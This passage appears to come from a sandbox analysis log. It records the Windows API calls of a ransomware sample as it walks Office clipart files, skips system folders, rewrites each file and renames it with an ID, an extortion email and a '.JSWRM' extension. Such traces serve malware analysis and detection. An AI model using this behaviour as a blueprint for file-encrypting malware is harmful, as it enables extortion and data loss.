lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0078.874] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xce2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00443_.WMF", cAlternateFileName="")) returned 1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2=".") returned 1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="..") returned 1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="...") returned 1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="windows") returned -1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="recovery") returned -1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="perflogs") returned -1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="documents and settings") returned 1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="system volume information") returned -1 [0078.874] lstrcmpiW (lpString1="HH00443_.WMF", lpString2="msocache") returned -1 [0078.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0078.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00443_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00443_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00443_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0078.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0078.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00443_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00443_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00443_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0078.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0078.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.881] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3298) returned 1 [0078.881] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xce0) returned 0x23fc98 [0078.881] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xce0, lpOverlapped=0x0) returned 1 [0078.883] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.883] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xce0, lpOverlapped=0x0) returned 1 [0078.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.883] CloseHandle (hObject=0x314) returned 1 [0078.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0078.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0078.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0078.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0078.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0078.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0078.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0078.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0078.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0078.884] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00513_.WMF", cAlternateFileName="")) returned 1 [0078.884] lstrcmpiW (lpString1="HH00513_.WMF", lpString2=".") returned 1 [0078.884] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="..") returned 1 [0078.884] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="...") returned 1 [0078.884] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="windows") returned -1 [0078.884] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="recovery") returned -1 [0078.885] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="perflogs") returned -1 [0078.885] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="documents and settings") returned 1 [0078.885] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.885] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="system volume information") returned -1 [0078.885] lstrcmpiW (lpString1="HH00513_.WMF", lpString2="msocache") returned -1 [0078.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0078.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00513_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00513_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00513_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0078.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0078.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00513_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00513_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00513_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0078.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0078.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0078.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.885] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=818) returned 1 [0078.885] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x330) returned 0x20b1f8 [0078.886] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0078.889] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.889] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0078.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0078.889] CloseHandle (hObject=0x314) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0078.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0078.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0078.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0078.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0078.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0078.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0078.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0078.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0078.890] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00524_.WMF", cAlternateFileName="")) returned 1 [0078.890] lstrcmpiW (lpString1="HH00524_.WMF", lpString2=".") returned 1 [0078.893] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="..") returned 1 [0078.893] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="...") returned 1 [0078.893] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="windows") returned -1 [0078.893] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="recovery") returned -1 [0078.894] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="perflogs") returned -1 [0078.894] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="documents and settings") returned 1 [0078.894] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.894] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="system volume information") returned -1 [0078.894] lstrcmpiW (lpString1="HH00524_.WMF", lpString2="msocache") returned -1 [0078.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0078.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00524_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00524_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00524_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0078.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0078.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00524_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00524_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00524_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0078.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0078.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0078.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0078.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.894] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14688) returned 1 [0078.894] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3960) returned 0x24d210 [0078.894] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3960, lpOverlapped=0x0) returned 1 [0078.900] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.900] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3960, lpOverlapped=0x0) returned 1 [0078.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.900] CloseHandle (hObject=0x314) returned 1 [0078.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0078.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0078.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0078.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0078.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.901] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0078.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0078.901] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34e2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00526_.WMF", cAlternateFileName="")) returned 1 [0078.901] lstrcmpiW (lpString1="HH00526_.WMF", lpString2=".") returned 1 [0078.901] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="..") returned 1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="...") returned 1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="windows") returned -1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="recovery") returned -1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="perflogs") returned -1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="documents and settings") returned 1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="system volume information") returned -1 [0078.902] lstrcmpiW (lpString1="HH00526_.WMF", lpString2="msocache") returned -1 [0078.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0078.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00526_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00526_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00526_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: 